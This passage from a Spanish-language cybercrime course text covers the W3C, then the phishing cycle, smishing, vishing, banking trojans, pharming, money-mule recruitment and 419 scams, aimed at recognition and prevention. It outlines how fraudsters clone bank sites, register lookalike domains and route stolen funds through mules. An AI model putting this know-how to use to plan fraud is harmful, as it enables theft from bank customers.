de la red y del mundo, recibirá los mismos resultados cuando acceda a Internet. Sin esto,
podría ocurrir que Internet funcionaría de una forma totalmente distinta en función de su
ubicación geográfica.
1.8. World Wide Web Consortium (W3C)

El W3C (World Wide Web Consortium), es un consorcio internacional que produce
recomendaciones para la web. Fue creado el 1 de octubre de 1994 en el MIT (Massachusetts
Institute of Technology) por Tim Berners-Lee, el creador de HTTP (HyperText Transfer
Protocol), HTML (HyperText Markup Language) y URL (Uniform Resource Locator), las

principales tecnologías en que se basa la web.
La propia página de W3C: https://www.w3.org/Consortium/ establece la diferencia entre
“internet” y “web” de la siguiente manera:
“Internet es un sistema global de redes informáticas interconectadas que

intercambian datos mediante conmutación de paquetes utilizando el conjunto
de protocolos de Internet estandarizados (TCP/IP)”.
Así, Internet es una red de redes, definida por los estándares TPC/IP.
La Web, por otro lado, se define en la Arquitectura de la World Wide Web del W3C,
Volumen I, de la siguiente manera: “La World Wide Web (WWW, o simplemente Web)
es un espacio de información en el que los elementos de interés, denominados
recursos, se identifican mediante identificadores globales llamados Identificadores
uniformes de recursos (URI)”.
Así, la Web es un espacio de información. Las primeras tres especificaciones para
tecnologías web definieron URL, HTTP y HTML.
La actividad principal del W3C es, por tanto, desarrollar protocolos y pautas que garanticen
el crecimiento a largo plazo de la “Web”. Los estándares del W3C definen partes clave de
lo que hace que la World Wide Web funcione.
W3C no tiene una sola sede física. Hay cuatro instituciones que “anfitriones” del W3C: MIT
(en Cambridge, MA, EE. UU.), ERCIM (en Sophia-Antipolis, Francia), la Universidad de Keio
(cerca de Tokio, Japón) y la Universidad de Beihang (en Beijing, China).
2. Tipología delictiva en
cibercrimen.
2.1. Estafas en la banca electrónica. Phishing.
La banca electrónica es uno de los servicios con mayor aceptación y utilización por los
usuarios de Internet. Esto es debido a que, a través de su web, los clientes de una entidad
pueden realizar consultas, operaciones y transacciones de forma completamente
autónoma, ágil, inmediata y sin limitación por fecha, situación geográfica u horario.
Sin embargo, el acceso desde Internet mediante un sistema de identificación y validación

del usuario de la banca electrónica es al mismo tiempo su debilidad, al ser esta
identificación potencialmente vulnerable a su interceptación y utilización por personas
no autorizadas.

Podemos entender como phishing aquellas acciones desarrolladas con fin de obtener
mediante ingeniería social o malware la información necesaria para acceder de manera
no autorizada a determinados servicios —no únicamente financieros—suplantando en
ellos la identidad de su legítimo titular. Generalmente, el fin perseguido es la realización
de transferencias desde las cuentas de las víctimas hasta otras gestionadas directa o, en
la mayoría de los casos, indirectamente por los responsables del ataque.
Si bien, como acabamos de definir, el término phishing hace referencia únicamente a

la fase previa de la estafa, caracterizada por tener como finalidad la obtención de las
claves necesarias para acceder a la banca electrónica de la futura víctima, comúnmente
se emplea este término para definir el proceso delictivo completo, a saber: obtención
de claves de identificación, acceso a los datos privados de la víctima y, finalmente,
trasferencia y monetización del importe económico defraudado. En este tema se engloba
el proceso completo bajo el término «ciclo del phishing».
CICLO DEL PHISHING
El ciclo del phishing se puede dividir en distintas fases atendiendo a los pasos que, como
actos preparatorios, se diseñen y ejecuten con la finalidad de lograr el objetivo final.
Se trata de un proceso complejo en el que intervienen distintos actores en tiempos
distintos y con responsabilidades e implicaciones diferentes, si bien complementarias
y necesarias todas ellas.
De manera simplificada y para el presente documento, se ha optado por identificar y

agrupar todas las actividades en únicamente tres fases independientes:
Ilustración 1. Fases del ciclo del phishing.

Como es fácilmente comprensible, al no estar sujetas a ningún estándar o norma
homologada, cada diseño y desarrollo de una campaña de phishing depende
exclusivamente de sus responsables. En cada caso concreto, las fases serán distintas
en cuanto a su extensión, duración, complejidad y objetivos, así como a cualquier otro
factor que en cada momento pueda interesar a los phishers (nombre con el que se
conoce a los autores del phishing). No obstante, las podemos simplificar agrupándolas
en las siguientes fases.
FASE I: CAPTURA DE DATOS
Se centra en la obtención de datos confidenciales, como nombres de usuario, claves

de acceso, números de teléfono, domicilios, documentación— pasaportes, tarjetas de
identidad, etc.— tipos y numeración de las tarjetas bancarias, su fecha de caducidad, su
CCV, el seudónimo y contraseña de usuario de páginas de subastas o redes sociales
y un larguísimo etcétera de información personal que puede ser considerada de interés
por parte de los ciberdelincuentes para diseñar su objetivo final, es decir, el tipo concreto
de fraude que quiere realizar.
Para obtener los datos referidos y teniendo en cuenta la capacidad técnica del
delincuente o las posibilidades de acceso a software específico, existen dos vías para
iniciar la campaña de recopilación de información: bien a través de ingeniería social,
sirviéndose para ello de avisos mediante correos electrónicos, redes sociales, etc.; o bien
mediante algún tipo de malware específicamente diseñado para tal efecto.
INGENIERÍA SOCIAL
INTRODUCCIÓN
Se pretende que sea la potencial víctima la que facilite voluntariamente sus datos
de identificación en la banca electrónica. Para ello, emplean técnicas que han ido
evolucionando y perfeccionando en el transcurso del tiempo, como consecuencia
del aumento en la concienciación del usuario en cuestiones de seguridad. Requiere
un período previo de elaboración durante el cual realizan acciones preparativas de la
campaña de phishing, como pueden ser las siguientes:
• Diseñar una web con idéntica apariencia a la de la entidad financiera a
cuyos clientes se dirige el phishing. La manera más sencilla de copiar una
web es descargar la original con cualquier software que lo permita y realizar
sobre ella los cambios necesarios —esencialmente de programación— a fin
de poder capturar los datos de acceso que de manera manual incluyen los
usuarios legítimos (esta falsificación de web se conoce como web spoofing).
No obstante, los phishers comprobarán si la web original cuenta con alguna
vulnerabilidad que pueda ser explotada (como un ataque de cross site
scripting (XSS)) por los atacantes. De ser así, la aprovecharán para obtener
de ella la información confidencial de sus víctimas.
• Registrar un dominio lo más parecido posible al de la entidad sobre la

que pretendan realizar el phishing. Suelen registrar dominios muy similares
al original, a fin de confundir al usuario, e incluso registran dominios de
segundo nivel en otros países con distinto dominio de primer nivel (ejemplo:
bancosantander.es en bancosantander.ec).
• La web creada se debe alojar en un servidor web, generalmente público y
comercial, para que resulte accesible desde los equipos informáticos de las
víctimas. En otras ocasiones, utilizan servidores legítimos donde se alojan
servicios informáticos que nada tienen que ver con la estructura criminal, pero
que, al contar con vulnerabilidades, son utilizadas de manera ilegítima y sin
conocimiento de sus administradores.
• Obtención de direcciones de correo electrónico activas a las que dirigir la
campaña de phishing. Estas direcciones se pueden adquirir de distintas
maneras. Desde su compra en mercados más o menos legítimos, de bases de
datos donde se almacenan miles de direcciones electrónicas, hasta el proceso
de identificar y archivar electrónicamente las direcciones que aparecen en
multitud de páginas web o, incluso, generándolas automáticamente mediante
programas informáticos específicamente programados para esta actividad.
• Acceso a servidores que, de manera voluntaria o por deficiencias en su
configuración de seguridad, son utilizados para enviar desde ellos los correos
electrónicos con la campaña de phishing. Como norma general, instalan
software que permite la automatización de envío de correos electrónicos de
manera masiva, como si de cualquier otra campaña de spam legal se tratase.
• Finalmente, se diseña el texto y contenido del mensaje que se enviará a través
de correo electrónico u otro sistema de comunicación, como puede ser un
SMS.
CORREOS ELECTRÓNICOS FRAUDULENTOS
En el diseño del correo electrónico se materializará el engaño a la víctima, al lograr

simular que proviene de una entidad bancaria o financiera, de un organismo oficial, de
una empresa, de una ONG, etc. Dependiendo de este supuesto origen así será el texto que
incluirá.
Los más habituales hacen referencia a entidades bancarias que, alegando problemas
de seguridad, cambios en su política de acceso, detección de presuntos fraudes o
actualización de sus sistemas, requieren una aceptación de condiciones o confirmación
de datos personales, para lo que el cliente debe acceder a la supuesta página oficial
mediante un enlace que se encuentra en el cuerpo del mensaje. El objetivo es convencer
a la víctima de que se trata de una comunicación normal enviada por vía electrónica sin
que le resulte sospechosa.
EJEMPLOS DE CAMPAÑAS DE PHISHING: Como se puede observar, en este ejemplo se

encuentran las características de un phishing no muy elaborado. Una redacción
en castellano deficiente: «le pedimos a Usted a introducir los detalles completos de la cuenta para
que pudamos renovar nuestra base de los clientes...», direcciones webs con nombres de dominio muy

similares a los de la entidad que pretenden suplantar: www.bancosantader.es, www.
gruposantahder.es y errores típicos causados por utilizar los mismos modelos de correos
para distintas campañas de phishing, esto es, hacer mención a una entidad distinta a la
que supuestamente lo envía: «esta carta se automáticamente manda a cada cliente del
kutxa...».
Ilustración 2. Ejemplo de correo electrónico phishing mal elaborado. Fuente: UNIR
En este caso, como en la práctica totalidad de este tipo de mensajes, al pulsar sobre los
enlaces se abriría una página web —con idéntico diseño a la de la entidad objetivo— en
la que aparece un formulario que invita a introducir el nombre de usuario, la clave de
acceso y, en ocasiones, la clave de operaciones. Es decir, la víctima facilita todos los datos
necesarios tanto para acceder a su banca online como para efectuar transferencias
electrónicas.
Ilustración 3. Ejemplo de phishing. Fuente: UNIR
En otras ocasiones, las URL no aparecen literalmente, sino que se invita al receptor del
mensaje a hacer clic sobre un enlace, un botón de aceptar o similar. Si se sitúa el puntero
sobre enlace, se puede ver cuál es la dirección real a la que redirecciona. En el caso

del ejemplo, al consultar la dirección IP que aparece (70.103.198.51), se comprueba que el
enlace, en realidad, se efectúa con una web alojada en una empresa situada en EE. UU., lo
que podría ser una indicación sobre la ilegitimidad del correo recibido.
Ilustración 4. Ejemplo de enlace phishing
En los mensajes más preparados, la dirección URL que aparece corresponde con la
entidad financiera real; sin embargo, al situar el puntero sobre el enlace se observa que
redirige en realidad a una dirección ajena a la entidad suplantada.
Ilustración 5. Ejemplo de enlace phising en apariencia real. Fuente: UNIR
Como ya se ha mencionado, los correos fraudulentos no solo hacen referencia a entidades

bancarias, sino que también utilizan la imagen de otras entidades o instituciones
para lograr el engaño en sus víctimas. Así, existen correos presuntamente enviados por
entidades gestoras de tarjetas de crédito o débito.
En este caso, se trata de una campaña de phishing dirigida a obtener datos relacionados
con tarjetas de crédito asociadas a VISA. Como se observa en el ejemplo, tanto la
redacción como el vocabulario utilizado son correctos y sin apenas errores gramaticales,
mostrando una apariencia digna de todo crédito.

Ilustración 6. Ejemplo de phising bien redactado.
Sus autores buscan atemorizar a los receptores del correo sobre la potencial utilización
ilegítima de sus tarjetas bancarias. En el mensaje que se muestra, informan de que se
ha realizado una supuesta utilización de la tarjeta bancaria «fuera del patrón típico
de compra» y que la tarjeta del cliente pude estar comprometida. Para dar aún más
credibilidad le asignan un supuesto número de caso y le solicitan que verifique su
identidad mediante el acceso a una web.
En este otro ejemplo de phishing, dirigido también a obtener datos de tarjetas

bancarias, los autores decidieron que era más rentable enviar un correo en nombre
de las dos empresas gestoras de tarjetas bancarias más importantes. Este hecho,
el que dos empresas que son competencia directa se hayan unido para enviar un
correo, debería ser suficiente indicio para levantar las sospechas de cualquier usuario
sobre su auténtica motivación. Pero, de pasar por alto esto, la redacción debería
alarmar de inmediato: «recordar que esta es la intención de registrar su seguridad».
Ilustración 7. Ejemplo de phising que suplanta dos empresas

A través del enlace «Haga ahora» se accede a dos formularios consecutivos, en los que
se solicitan todo tipo de datos personales con la supuesta finalidad de evitar el uso
fraudulento de la tarjeta.
Ilustración 8. Ejemplo de formulario 1 phishing
Esta misma campaña de phishing se realiza paralelamente en distintos países, por lo

que tanto el correo inicial como los formularios que se envían son modificados por los
autores, que varían los textos para que aparezcan en el lenguaje del potencial destinatario.
Esto trae consigo que cometan ciertos errores ortográficos, gramaticales o de idioma. En
el ejemplo, podemos ver que utilizan «nombres» (en plural) y «apellido» (en singular), lo
que indica que utilizan una base extranjera en la que lo habitual es tener dos nombres y
un solo apellido. También incluyen «code postal» en lugar de código postal. Otro detalle
que sobresale es que, bajo los campos donde se debe insertar la fecha de nacimiento,
aparecen las letras «jj» que pudieran hacer referencia a la palabra alemana jahr, que se
traduce como año.
Una vez completada la primera parte del formulario, la información se remite

electrónicamente a servidores controlados por los phishers. Tras esto, y de manera
automática, se inicia un segundo formulario diseñado para capturar los datos de la
tarjeta bancaria.

Ilustración 9. Ejemplo de formulario 2 phishing.
Con los datos enviados a los phishers a través de los formularios mostrados como ejemplo,
los delincuentes pueden no solo utilizar las numeraciones de las tarjetas en comercio
electrónico, sino que además las pueden clonar, es decir, duplicarlas físicamente para
realizar con ellas compras en establecimientos físicos o retirar dinero desde cualquier
cajero automático. Más importante incluso que el quebranto que podrían hacer con
la utilización de la tarjeta a la víctima, los delincuentes también podrían suplantar su
identidad completa y utilizarla para la comisión de cualquier otro tipo de delito.
Al finalizar el proceso completo y capturar la información de la víctima, la misma página

falsa enlaza con la auténtica de VISA España a fin de completar el proceso sin despertar
ningún tipo de sospechas sobre su origen fraudulento. Así se evita que se detecte el robo
de información en ese momento.
Como ya se ha mencionado, la variedad de entidades, empresas y organismos

suplantados en las campañas de phishing es enorme. Por citar alguna que se repite de
manera cíclica, se puede señalar a la que se sirve de la imagen de la Agencia Tributaria.
El phishing busca obtener los datos personales de sus víctimas tras convencerles que
tienen pendientes una devolución, cosa que no es la práctica habitual en este organismo.
No obstante, no se debe despreciar el poder de convicción que aún mantiene o la
curiosidad que provoca y que hace que se pulse sobre el enlace web con el que cuenta
el texto del mensaje electrónico.

Ilustración 10. Campaña phishing que suplanta a la Agencia Tributaria
Otra empresa que es utilizada constantemente para realizar campañas de phishing

es PayPal. Generalmente, los correos enviados hacen referencia al supuesto bloqueo
de la cuenta del usuario o que se ha efectuado una trasferencia desde esa cuenta y
solicita que se acceda a través de un enlace para reactivarla o confirmar la operación.
Como cabe suponer, la web que se abre al pulsar sobre el link es una suplantación de
la original, donde se piden los datos de usuario y clave de acceso. Tras esto, una nueva
web se muestra pidiendo la información asociada a la cuenta de PayPal, incluyendo por
supuesto los referidos a la tarjeta de crédito asociada.
Ilustración 11. Campaña phishing que suplanta a PayPal

Como modo sencillo para comprobar que se trata de un intento de estafa, basta con
situar el puntero sobre cualquiera de los enlaces que aparecen en el texto del correo.
De esta manera se conoce cuál es la dirección web real a la que redirige el link, que no
guarda relación con PayPal.
Ilustración 12. Comprobación de estafa phishing.
SMS FRAUDULENTOS: SMISHING
Es preciso iniciar este apartado detallando que este tipo de mensajería va cayen-
do en desuso mientras crece otra mensajería más instantánea como WhatsApp.
Otra manera de obtener los datos privados mediante ingeniería social es a través de
mensajes SMS o MMS. Las comunicaciones simulan provenir de una entidad financiera o
bancaria. Informan al titular de que han surgido problemas de validación en su tarjeta
o que esta ha sido bloqueada por razones de seguridad y que para poder volver a utili-
zarla debe acreditar su titularidad mediante un formulario al que se accede a través de
una dirección web.
Ilustración 13. Ejemplo smishing

Como cabe esperar, tras la dirección se encuentra un formulario que únicamente pretende obtener
los datos de la tarjeta bancaria supuestamente bloqueada.
Ilustración 14. Ejemplo de formulario smishing.
La clara apuesta que se está haciendo por la banca electrónica y el acceso a esta desde
distintas plataformas móviles lleva aparejada que el smishing y otras evoluciones del
phishing —dirigidas a las nuevas vías de comunicación electrónica— estén despertando el
interés en las organizaciones criminales, que las perciben como una nueva oportunidad
de negocio, toda vez que sobre estos nuevos dispositivos no existe una concienciación en
seguridad tan extendida como en las computadoras personales.
LLAMADAS FRAUDULENTAS: VISHING
Los delincuentes contactan telefónicamente con sus víctimas simulando provenir de

una entidad bancaria e informándoles de la presunta utilización fraudulenta de su tarjeta
bancaria. Estas comunicaciones suelen realizarse a través de servicios de telefonía sobre
VoIP (voz sobre IP, tecnología sencilla que permite que las llamadas se realicen a través
de Internet desde cualquier parte del mundo aprovechando las facilidades de anonimato
que la red ofrece).
Por lo general, la comunicación no se efectúa por una persona real, sino que se trata
de una grabación que sigue patrones similares a los utilizados por los distintos servicios
de atención al cliente. Durante la comunicación se requieren los datos bancarios o
las numeraciones de las tarjetas de crédito, incluyendo el número PIN, la fecha de
caducidad y el código CVV como paso previo a poder ser atendido supuestamente por
un operador. En otras ocasiones, las grabaciones telefónicas remiten al cliente a una
página web en la que realizar las presuntas comprobaciones, a través de formularios
donde los phishers obtienen los datos que buscan.
PESCA DIRIGIDA: WHALING
Esta modalidad no está dirigida a cualquiera que pueda recibir el correo electrónico
típico del phishing, sino que se centra en la búsqueda de un perfil concreto de usuario

de banca online. Se dirigen a directivos de determinadas compañías, a administradores
de redes, a personal clave en organizaciones concretas, a personas mayores con
importantes activos económicos, a empresarios, etc.
Se centran sobre estos grupos al suponer que disponen de mayor capacidad económica.
En otras ocasiones, lo que se pretende es tener acceso a información sensible que podrá
ser utilizada para cuestiones distintas al simple robo de dinero.
MALWARE
INTRODUCCIÓN
El crecimiento exponencial de ataques de phishing que se produjo con la universalización

de los servicios de banca electrónica tuvo como natural consecuencia que las entidades
iniciaran campañas de advertencia y sensibilización sobre seguridad, dirigidas a sus
clientes con la finalidad de disminuir su incidencia. Al mismo tiempo, se implementaron
medidas de fortalecimiento en la identificación de los usuarios de la banca electrónica
y pasaron a utilizarse por defecto —junto con login y password— otros sistemas como las
tarjetas de coordenadas o dispositivos tipo token (dispositivo que genera contraseñas
dinámicas y válidas por un período limitado de tiempo, generalmente de un solo uso),
con los que se pretendía garantizar la no suplantación del usuario.
Estas medidas llevaron a los criminales a desarrollar otros sistemas de ataque que les
permitieran robar la identidad electrónica de sus víctimas. Desde ese momento, los
programas conocidos como virus o gusanos informáticos abandonaron sus objetivos
iniciales, que se centraban únicamente en causar daños informáticos, para comenzar
a orientarse en lo que hoy conocemos como software malicioso o malware. Su principal
característica y objetivo consiste en robar cualquier tipo de información confidencial
de los sistemas informáticos en los que se instala, sin que sea detectada ni su presencia
ni su actividad.
El éxito en la infección por un malware puede deberse a la existencia de vulnerabilidades

en el sistema, conocidas por los atacantes, o a procedimientos exitosos de ingeniería
social. La consecuencia es que el usuario ejecuta el código dañino que se halle, por
ejemplo, en un documento adjunto recibido en un correo o en alguna web diseñada o
modificada por los phishers.
Los primeros malware diseñados para acceder a los servicios de banca electrónica que
se detectaron fueron los conocidos como keyloggers y screenloogers:
Keyloggers. Se trataba de programas que recogían en un fichero las pulsaciones que

se realizaban sobre el teclado. En su variante de malware bancario, estos programas

estaban diseñados para activarse cuando detectaban que se accedía a una de las URL
para las cuales habían sido programados, esencialmente pertenecientes a entidades
bancarias. Toda la información recogida (claves de acceso, nombre de usuarios, claves
de firma, etc.) se enviaba al phisher que lo controlaba.
Screenloggers. Una de las primeras medidas que tomaron los responsables de la

banca electrónica para aumentar la seguridad en la identificación de sus clientes fue la
implementación de los teclados virtuales en sus accesos online. Este tipo de teclados
requerían que el usuario pulsara con el puntero sobre la pantalla en lugar de hacerlo sobre
el teclado físico. Ante esto, los ciberdelincuentes desarrollaron los programas conocidos
como screenloogers, que permitían capturar porciones de la pantalla, alrededor del lugar
en el que se pulsa con el puntero.
Como contramedida, los diseños de teclados virtuales incluyeron como característica

que, al pulsar sobre el número o letra, aparecieran en la pantalla asteriscos en lugar de
los dígitos. La continua evolución en malware permitió a los ciberdelincuentes desarrollar
nuevos «especímenes», que cuentan con la posibilidad de capturar fragmentos de vídeo
donde quedan reflejados los movimientos del puntero sobre la pantalla, por lo que
conocen sobre qué números o letras se sitúa el puntero antes de pulsar sobre ellos.
Con el desarrollo de las medidas de seguridad y con la dependencia de los usuarios de la

banca electrónica hacia las nuevas tecnologías, se está impulsando a los diseñadores de
malware a crear programas cada vez más sofisticados que aumentan en complejidad y
potencialidad criminal. Su desarrollo constante les permite adaptarse a las peculiaridades
de cada mercado al que se dirigen.
Estudian cada entidad financiera, bancaria o de cualquier otra naturaleza a la que

pretenden atacar; y conocen ampliamente el diseño de sus páginas web, el tipo de
tecnología con que están dotadas, la semántica del código HTML o Java que emplean.
Con toda esta información desarrollan ataques especialmente dirigidos a explotar las
vulnerabilidades detectadas, logrando un muy alto porcentaje de éxito en sus ataques.
Como exponentes de malware, se puede hacer referencia a los programas conocidos

como troyanos bancarios y al ataque definido como pharming.
TROYANOS BANCARIOS
Como se ha comentado, las técnicas de phishing junto con la ingeniería social se sirven
de un tipo de malware específicamente diseñado y desarrollado con el único objeto de
robar información de acceso a la banca electrónica o a cualquier otro servicio como
redes sociales o correo electrónico, para obtener beneficios con la comisión de fraudes
bancarios. Este tipo específico de malware se conoce como troyano bancario.

Su diseño les permite determinar cuándo deben activarse y comenzar a actuar, lo que
evita la captura de información inútil para sus fines y estar activo un tiempo elevado, que
conllevaría una mayor posibilidad de ser detectado. Su activación se produce cuando,
desde el equipo en el que se ha instalado, se accede a una de las direcciones web
que tiene almacenadas en su programación como objetivo. A partir de ese momento
comienza su actividad de espionaje de datos, que se producirá de diversas maneras
dependiendo de cómo estén configurados o cuán actuales sean los troyanos.
A modo de ejemplo de métodos de captura de datos, podemos citar la captura y

modificación de formularios y páginas web. El malware consigue que, al mostrarse
un formulario en la web original de una entidad, junto con los campos preestablecidos
aparezcan otros nuevos incluidos por el malware mediante programación. En ellos se
solicita al usuario que introduzca datos adicionales de los que demanda la página web.
Estos tipos de ataque o método de captura de información surgen tras la implementación

de sistemas complementarios de autentificación del cliente, como las tarjetas de
coordenadas o claves secundarias para operar en la banca electrónica. Algunos tipos
de malware, al detectar la solicitud de las coordenadas, comienzan a pedir todos los
datos de la tarjeta, con lo que, si el usuario se las facilita pensando que cuantas más
coordenadas le pida más seguro será el sistema, en realidad estará cediendo estos datos
a los phishers y anulará la seguridad implementada con la tarjeta de coordenadas.
En la actualidad existe malware destinado a la captura de datos bancarios de altísima

complejidad y grado muy elevado de éxito. A modo de ejemplo, se puede citar el
conocido ZeuS, uno de los más exitosos en propagación y en resultados.
Con las nuevas vías de acceso a la banca electrónica y al resto de servicios personales
a través de los smartphones y las tabletas, los desarrolladores de malware —siguiendo su
lógica empresarial— han fijado sus objetivos en el diseño de malware específicamente
destinado a estos nuevos dispositivos, conocedores de que en poco tiempo se accederá
mayoritariamente a Internet y a la banca electrónica desde estos sistemas.
ALTERACIÓN DE DNS: PHARMING
Al igual que los mensajes de correo electrónico y los dirigidos a los teléfonos móviles, el
objetivo del pharming es lograr que la víctima acceda a una página web fraudulenta
diseñada, o al menos modificada, con la finalidad de capturar información confidencial.
Para su éxito no se requiere la acción consciente de la víctima, como ocurre en los
ataques asociados a la ingeniería social, sino que se produce por una manipulación
informática.
Cuando un usuario teclea en su navegador una dirección web, por ejemplo, www.unir.net,

el servicio de DNS (domain name system) traduce el nombre de la web (el dominio) por la
dirección IP en la que se encuentra alojado, haciendo que sea esta la que el navegador
muestre al usuario.
El pharming consiste en modificar el servicio de DNS para que, al escribir la dirección de

la web, no se muestre la real sino una fraudulenta con igual apariencia a la original. Esto
causa engaño en la víctima que, al creer que se encuentra en la auténtica, introducirá
sus claves para que sean robadas.
Dependiendo de lo sofisticado que sea el ataque, los delincuentes pueden modificar

las tablas del servidor de DNS, con lo que lograrían que todos los usuarios de Internet
que tuvieran a ese DNS como referencia se vieran afectados por el ataque o en local
alterando únicamente la navegación de un usuario.
Un ataque en local se realiza aprovechando una característica del diseño de los sistemas
operativos, consistente en la existencia de un archivo en el que se almacenan nombres
de dominios y la dirección IP asociada a ellos. Si esta relación de dominios e IP es alterada
por un malware diseñado para efectuar ataques de pharming en local, cuando el
usuario teclee una dirección web, su navegador o cualquier otra aplicación que necesite
acceder a Internet se dirigirá en primer lugar al archivo referido antes, donde encontrará
la dirección web solicitada que enlaza con una dirección IP (modificada por el ataque),
que será a la que se acceda sin que sea necesario una consulta al DNS, toda vez que
supuestamente conoce su situación en la red.
Como contramedida, en principio bastaría con que el usuario se cerciorase de la

existencia de una conexión segura a través del protocolo SSL. Sin embargo, existen tipos
de malware que instalan certificados para cifrar y validar la conexión con la página
falsa, por lo que salvarían de este modo la desconfianza inicial de la víctima.
Ilustración 15. Indicador de conexión segura
No siempre que se obtienen datos mediante estas técnicas estos son utilizados
directamente por los atacantes para realizar las siguientes fases del ciclo del phishing, sino
que en muchos casos son vendidos a otros delincuentes u organizaciones criminales. De
esta manera se produce un auténtico tráfico de datos personales y mercado secundario
de información.

FASE II: CAPTACIÓN DE MULAS
Como resultado de las técnicas descritas en la fase I, los phishers disponen de la

información necesaria para acceder a la banca electrónica de sus víctimas y para realizar
transferencias en su nombre. No obstante, esto es únicamente una posibilidad, ya que
para poder hacer efectivo del dinero y, por lo tanto, disponer de él, necesitan a personas
que residan en el mismo país de las víctimas para facilitar y agilizar las transferencias, y
accedan a recibirlas en sus cuentas bancarias —con o sin conocimiento de su origen
ilícito— para después enviar el dinero recibido a los delincuentes a través de empresas
de envío internacional.
A estos colaboradores se les conoce como mulas o muleros y son captados a través
de distintos métodos que han ido evolucionando como adaptación a las constantes
campañas de información sobre estas estafas.
Tradicionalmente, la captación de las mulas se realiza mediante el envío de simples

correos electrónicos en los que se ofrece la posibilidad de realizar, desde casa y con total
libertad de horarios, una actividad laboral que exige poco tiempo de dedicación y por la
que a cambio se recibe una considerable compensación económica.
Ilustración 16. Oferta de trabajo para captación de mulas
Según sea la capacidad técnica del grupo criminal que se sitúa tras la campaña de
phishing o que se sirve de ella para realizar las estafas, así será la complejidad o la
elaboración de los correos, cuyo único fin es salvar las cada vez mayores reticencias de
los internautas en aceptar estos trabajos.

Así, de no disponer de un respaldo con capacidades técnicas, se conformarán con enviar
cientos de correos electrónicos fácilmente detectables como fraudulentos; mientras que,
si se trata de organizaciones más afianzadas o con un soporte técnico-informático
elevado, acompañarán a sus mensajes todo lujo de explicaciones avaladas con la
existencia de páginas web, creadas con la única intención de dotar de credibilidad las
ofertas de trabajo. En estas páginas aparecen las supuestas actividades empresariales
que se presentan con gran calidad, a fin de vencer las potenciales reticencias y hacer
creer que la actividad que se propone es legal y está respaldada por una importante
empresa internacional.
Ilustración 17. Oferta de trabajo elaborada para captación de mulas

No obstante, las ofertas de trabajo no son las únicas vías para captar a los colaboradores.
Existen innumerables modos para intentar lograr la participación de personas ajenas a
la organización criminal en su actividad ilícita. A modo de ejemplo, se pueden citar los
correos en los que se buscan personas que quieran colaborar en supuestas campañas
de ayuda a zonas afectadas por una crisis, un desastre natural o conflictos armados.
En estas modalidades se solicita a los receptores de los correos que participen como
parte de la cadena de remisión de dinero a los damnificados. Deben facilitar una cuenta
bancaria en la que recibirán parte de los importes donados por particulares y empresas
para después reenviarlos a los responsables de la organización humanitaria, utilizando
para ello los servicios de compañías de envío internacional de dinero. Con esta ayuda
presuntamente se pretende evitar la participación inicial de las entidades bancarias
para ahorrarse sus comisiones y facilitar que llegue más dinero a las personas que lo
necesitan sobre el terreno.
Una vez que los phishers han captado a las mulas, establecen redes a fin de garantizar
la plena disponibilidad de una o varias de ellas para cada transferencia que puedan
realizar. Los delincuentes tienen que asegurarse de que no se deja de materializar una
estafa por no disponer de una cuenta a la que realizar la transferencia. Por este motivo,
aunque en el presente tema se han descrito como consecutivas las fases I y II del ciclo
del phishing, en realidad se efectúan de manera simultánea.
Las redes o bolsas de mulas son utilizadas de manera que les permita a los phishers
diversificar los riesgos. Habitualmente, el dinero total que roban de la cuenta de una
víctima es enviado mediante varias transferencias a cuentas bancarias a nombre
de distintas mulas. Con esto logran minimizar los riesgos a que las operaciones sean
anuladas o identificadas como fraudulentas y a perder el importe total. Igualmente, se
aseguran de que, si alguna mula se arrepiente de su colaboración o decide quedarse
con el total del dinero recibido, no pierden el resto del importe defraudado.
Como se ha podido observar, las mulas son el elemento determinante del delito, ya
que sin su acción consciente y voluntaria no se podría consumar la estafa. Son ellos
los que reciben el importe defraudado y son ellos los que lo ponen a disposición de la
organización delictiva.
Es fácil advertir que toda la inversión que los phishers realizan en campañas de ingeniería
social, en el desarrollo de malware y en su distribución carece de sentido y de resultado
final sin la participación de las mulas. Estas son parte esencial en el proceso criminal,
con independencia de que sean o no conscientes de su participación en el delito.

FASE III: TRANSFERENCIA, MONETIZACIÓN Y ENVÍO DE LO DEFRAUDADO
Una vez con las claves de acceso a la banca electrónica de una víctima, los delincuentes
suplantan su identidad electrónica y realizan transferencias online por todo el importe
que puedan a las cuentas facilitadas por las mulas.
Si bien el acceso a la cuenta y la transferencia se puede materializar en cualquier horario,

prefieren realizarla en días y horas no laborables a fin de retrasar al máximo el momento
en que la víctima detecte el fraude, informe a la entidad bancaria de destino de la
ilegitimidad de la operación realizada y ordene su retrocesión.
Realizada la transferencia electrónica, inmediatamente los delincuentes se ponen en

contacto con la mula para pedirle que la haga efectiva y que, tras quedarse con un
porcentaje previamente establecido (suele rondar entre el 5 y el 10 % de lo recibido), les
remita el dinero a través de empresas internacionales de envío de dinero. Las direcciones
de envío suelen estar situadas en países del este de Europa.
En algunas ocasiones, los phisher piden a las mulas que entreguen el dinero personalmente
a miembros de la organización con la excusa de presentarlos como responsables de la
supuesta actividad comercial en su zona. Estas personas, captadas de forma parecida a
las mulas, pueden tener la residencia habitual en España y colaborar con la organización
criminal de manera estable o temporal. En otros casos, pertenecen a los escalones más
bajos de la organización y realizan viajes relámpago con la única intención de recoger
los resultados económicos de una campaña de phishing.
Los destinatarios a los que las mulas realizan los envíos de dinero no son los responsables
últimos de la estafa, sino que simplemente constituyen otros escalones de la organización
cuya misión se limita a recibir el importe transferido y, a su vez, remitirlo a otros niveles
superiores de la organización criminal.
Con el dinero en poder de los niveles más altos de la organización criminal, se cierra el
ciclo del phishing que, como se ha descrito, involucra a distintos actores en las distintas
fases de las que se compone, desde la preparación de la campaña y selección de
objetivos hasta la materialización del dinero y su recepción por los cibercriminales.
2.2. Otros tipos de fraude en la red

Las técnicas utilizadas para estafar a través de los distintos servicios de la red únicamente
están limitadas por la imaginación del delincuente. La característica que las define es la
exigencia en el uso de ingeniería social con la que lograr ocasionar un engaño suficiente
en la víctima como para que acceda a realizar la disposición económica y, con ello, el
consecuente beneficio económico que obtiene el autor de la estafa.

Es imposible mostrar en este manual todos los tipos de estafas que se pueden cometer a
través de la red, consideradas por lo tanto como estafas informáticas o ciberestafas. Por
este motivo únicamente se describirán un número limitado de ellas, por ser, quizás, las
más características y representativas.
CARTA DE ESTAFA, SCAM 419
Las cartas de estafa, conocidas también como scam 419 (en referencia al artículo del
código penal de Nigeria que castiga esta actividad delictiva).
Con la universalización en el uso del correo electrónico, los estafadores han visto
exponencialmente mejorada su capacidad de envío de comunicaciones, acompañada
de un abaratamiento muy significativo de la inversión y una mayor rapidez en el contacto
con las víctimas y la consecuente materialización de la estafa.
